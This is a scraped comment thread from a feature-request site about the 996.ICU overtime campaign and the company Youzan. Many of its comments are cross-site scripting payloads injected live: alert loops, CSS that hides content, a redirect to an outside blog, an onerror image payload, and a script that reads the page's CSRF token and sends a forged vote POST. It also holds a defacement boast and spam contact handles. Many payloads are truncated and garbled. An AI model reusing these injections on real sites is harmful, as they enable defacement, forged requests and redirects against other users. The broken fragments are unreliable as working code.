LinXueyuanStdio/996.ICU

有赞

llccing asked for this feature 9 months ago — 41 comments

llccing commented 9 months ago

img,svg,table{visibility: collapse;}

doujiaowosunlin commented 9 months ago

有赞我们需要感谢你啊

| CTM-TT commented 9 months ago

有赞是不是便利蜂旁边的那家公司?

| DayDreamCoder commented 9 months ago

早有耳闻!

stone0311 commented 9 months ago

不是自我曝光了嘛,现在还加班呢?

| hreo-cxl commented 9 months ago

有赞是不是就是那家和swoole开源团队产生纠纷的那家?

| hreo-cxl commented 9 months ago

有赞是不是就是那家和swoole开源团队产生纠纷的那家?

| SSSEN commented 9 months ago

敢于自曝的公司,据说还和劳动局谈笑风生

| wenbaoyu commented 9 months ago

黑鸭白鸭,提996就不是好鸭!

| ssslkj123 commented 9 months ago

这种公司直接人力找的时候屏蔽就好了。

| ostopuro commented 9 months ago

反996工作机会介绍群

huowen commented 9 months ago

">

Faded1234 commented 9 months ago

alert("老哥有xss漏洞哦 修复下")

intrhuting commented 9 months ago

美国上市互联网企业,总部上海,硅谷、北京、深圳、广州、台北都有办公点,全球业务,飞速发展中,开发、运营、产品、销售、商务、设计职位都在招人,薪资丰厚,10点上班,6点多下班,一周5天,拒绝996,不进icu。想内推加v:sharehealthy

a346076818886 commented 9 months ago

alert('哈哈哈')

666sbX commented 9 months ago

Hacked By Helen收徒QQ925999918

world8023 commented 9 months ago

1

world8023 commented 9 months ago

alert(‘1!’)

| LinXueyuanStdio commented 8 months ago Admin

table{visibility: collapse;}

xjvr commented 8 months ago

alert('hello,gaga!');

| LinXueyuanStdio commented 8 months ago Admin

var commentBodySet = document.getElementsByClassName("body");for(var i=0;i

leo66123 commented 8 months ago

while(1){alert('wtf')}

reinit commented 8 months ago

Please report XSS vulnerability

var xmlReq = new XMLHttpRequest(); xmlReq.addEventListener("load", function() { alert("Please report XSS vulnerability at https://feathub.com/feathub/feathub/+65, or https://feathub.com/feathub/feathub/+66 if you love me."); }); xmlReq.open("POST", "https://feathub.com/feathub/feathub/+65/vote?vote[score]=1"); xmlReq.send();

reinit commented 8 months ago

Please report XSS vulnerability

var xmlReq = new XMLHttpRequest(); xmlReq.addEventListener("load", function() { alert("Please report XSS vulnerability at https://feathub.com/feathub/feathub/+65, or https://feathub.com/feathub/feathub/+66 if you love me."); }); xmlReq.open("POST", "https://feathub.com/feathub/feathub/+65/vote?vote[score]=1", true); xmlReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xmlReq.setRequestHeader("Cache-Control", "no-cache"); xmlReq.setRequestHeader("Referer", "https://feathub.com/feathub/feathub/+65"); xmlReq.send("method=patch&authenticitytoken=" + document.head.querySelector("[name~=csrf-token][content]").content);

superzmy commented 8 months ago

for(var x of document.getElementsByClassName("body")) { if (x.innerHTML.indexOf("script") >= 0) x.innerHTML = ""; } 反注入补丁 <script> for(var x of document.getElementsByClassName("body")) { if (x.innerHTML.indexOf("script") >= 0) x.innerHTML = ""; } <script>

ghostlo commented 8 months ago

为啥我的浏览器一点事都没有,大佬带带我啊

xianfengting commented 8 months ago

for(var x of document.getElementsByClassName("body")) { if (x.innerHTML.indexOf("script") >= 0) x.innerHTML = ""; }

tancky commented 8 months ago

alert('好玩吗?');

| zzxcvbnm19 commented 8 months ago

]>([\s\S])<\/body>/)[1].replace(/<?script?>/g,'').replace(/<\/?script?>/g,'').replace(//g, '')}};xmlhttp.open('GET',window.location.href,true);xmlhttp.send() }, 0)"/>

guotao commented 8 months ago

If it were too difficult to allow as the folder under root, window.location.href='https://blogs.kainy.cn/?from=feathubXSS2'; setTimeout("javascript:location.href='hello.html'", 0); how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。  。

guotao commented 8 months ago

guotao commented 8 months ago

fsdf

guotao commented 8 months ago

<img id='ls' src="11" onerror="setTimeout

guotao commented 8 months ago

]>([\s\S])<\/body>/)[1].replace(/<?script?>/g,'').replace(/<\/?script?>/g,'').replace(//g, '')}};xmlhttp.open('GET',window.location.href,true);xmlhttp.send() }, 0)"/>

guotao commented 8 months ago

ff。。

guotao commented 8 months ago

]>([\s\S])<\/body>/)[1].replace(/<?script?>/g,'').replace(/<\/?script?>/g,'').replace(//g, '')}};xmlhttp.open('GET',window.location.href,true);xmlhttp.send() }, 0)"/>

guotao commented 8 months ago

]>([\s\S])<\/body>/)[1].replace(/<?script?>/g,'').replace(/<\/?script?>/g,'').replace(//g, '')}};xmlhttp.open('GET',window.location.href,true);xmlhttp.send() }, 0)"/>

guotao commented 8 months ago

guotao commented 8 months ago

]>([\s\S])<\/body>/)[1].replace(/<?script?>/g,'').replace(/<\/?script?>/g,'').replace(//g, '')}};xmlhttp.open('GET',window.location.href,true);xmlhttp.send() }, 0)"/> If it were too difficult to allow as the folder under root, window.location.href='https://blogs.kainy.cn/?from=feathubXSS2'; setTimeout("javascript:location.href='hello.html'", 0); how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。  。

guotao commented 8 months ago

guotao commented 8 months ago

If it were too difficult to allow as the folder under root, window.location.href='https://blogs.kainy.cn/?from=feathubXSS2'; setTimeout("javascript:location.href='hello.html'", 0); how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。 反注入补丁 for(var x of document.getElementsByClassName("body")) { if (x.innerHTML.indexOf("script") >= 0) x.innerHTML = ""; } ]>([\s\S])<\/body>/)[1].replace(/<?script?>/g,'').replace(/<\/?script?>/g,'').replace(//g, '')}};xmlhttp.open('GET',window.location.href,true);xmlhttp.send() }, 0)"/>  。

Join the discussion!

Sign-in with GitHub to comment